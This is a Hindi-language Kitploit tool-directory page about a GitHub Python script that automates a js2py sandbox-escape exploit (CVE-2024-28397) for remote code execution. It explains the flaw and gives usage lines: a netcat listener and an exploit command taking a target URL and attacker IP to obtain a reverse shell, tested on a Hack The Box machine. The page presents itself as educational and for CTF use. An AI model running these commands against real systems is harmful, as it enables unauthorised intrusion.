Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28397-Exploit-Automation — एक Python ऑटोमेशन स्क्रिप्ट जो **js2py सैंडबॉक्स एस्केप** भेद्यता (CVE-2024-28397) का शोषण करने के लिए है। यह टूल पेलोड जनरेशन और डिलीवरी प्रक्रिया को स्वचालित करता है ताकि असुरक्षित इंस्टेंस पर रिमोट कोड एक्जीक्यूशन (RCE) प्राप्त किया जा सके। | Kitploit
उपकरण/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

एक Python ऑटोमेशन स्क्रिप्ट जो **js2py सैंडबॉक्स एस्केप** भेद्यता (CVE-2024-28397) का शोषण करने के लिए है। यह टूल पेलोड जनरेशन और डिलीवरी प्रक्रिया को स्वचालित करता है ताकि असुरक्षित इंस्टेंस पर रिमोट कोड एक्जीक्यूशन (RCE) प्राप्त किया जा सके।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-28397 शोषण ऑटोमेशन

js2py सैंडबॉक्स एस्केप भेद्यता (CVE-2024-28397) का शोषण करने के लिए एक पायथन ऑटोमेशन स्क्रिप्ट। यह उपकरण कमजोर इंस्टेंस पर रिमोट कोड एक्जीक्यूशन (RCE) प्राप्त करने के लिए पेलोड जनरेशन और डिलीवरी प्रक्रिया को स्वचालित करता है।

⚠️ कानूनी अस्वीकरण बिना पूर्व आपसी सहमति के लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है। यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। यह उपकरण अधिकृत सुरक्षा मूल्यांकन और कैप्चर द फ्लैग (CTF) वातावरण में उपयोग के लिए है।

🧐 भेद्यता के बारे में

CVE-2024-28397 js2py लाइब्रेरी (संस्करण < 0.74) को प्रभावित करता है। लाइब्रेरी जावास्क्रिप्ट वातावरण को होस्ट पायथन वातावरण से उचित रूप से अलग करने में विफल रहती है।

  • खामी: अनुचित इनपुट सैनिटाइजेशन पायथन के आंतरिक __class__ और __subclasses__ विशेषताओं तक पहुंच की अनुमति देता है।
  • प्रभाव: एक हमलावर होस्ट सर्वर पर मनमाना कमांड निष्पादन की अनुमति देने के लिए subprocess.Popen तक पहुंचने के लिए ऑब्जेक्ट पदानुक्रम को पार कर सकता है।

🚀 विशेषताएँ

  • स्वचालित पेलोड जनरेशन: स्वचालित रूप से जावास्क्रिप्ट सैंडबॉक्स एस्केप लॉजिक का निर्माण करता है।
  • बेस64 एन्कोडिंग: ट्रांसमिशन के दौरान सिंटैक्स त्रुटियों को रोकने के लिए पेलोड एन्कोडिंग को संभालता है।
  • कनेक्शन हैंडलिंग: अनुरोध टाइमआउट के आधार पर सफल शेल निष्पादन का पता लगाता है।
  • पेशेवर आउटपुट: स्थिति अपडेट के साथ साफ CLI इंटरफ़ेस।

🛠️ उपयोग

पूर्वापेक्षाएँ

root@kitploit:~
pip install requests

अपना Netcat लिसनर शुरू करें :

root@kitploit:~
nc -lvnp 1337

स्क्रिप्ट चलाएँ :

root@kitploit:~
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 प्रूफ ऑफ कॉन्सेप्ट

यहाँ एक कमजोर लक्ष्य (हैक द बॉक्स - कोडटू) के खिलाफ उपकरण का क्रियान्वयन दिखाया गया है:

1. निष्पादन

पेलोड उत्पन्न करने और कॉलबैक ट्रिगर करने के लिए शोषण चलाना: crop3

2. सफलता

लिसनर पर रिवर्स शेल प्राप्त करना: Reverse Shell Success

  • 📜 श्रेय

  • भेद्यता खोज और मुख्य JS पेलोड: Marven11

  • ऑटोमेशन स्क्रिप्ट: L1337Xi

  • सहयोगी:

    • Leyn4L
    • iamrizwanvp
    • axai457
टूल डाउनलोड करें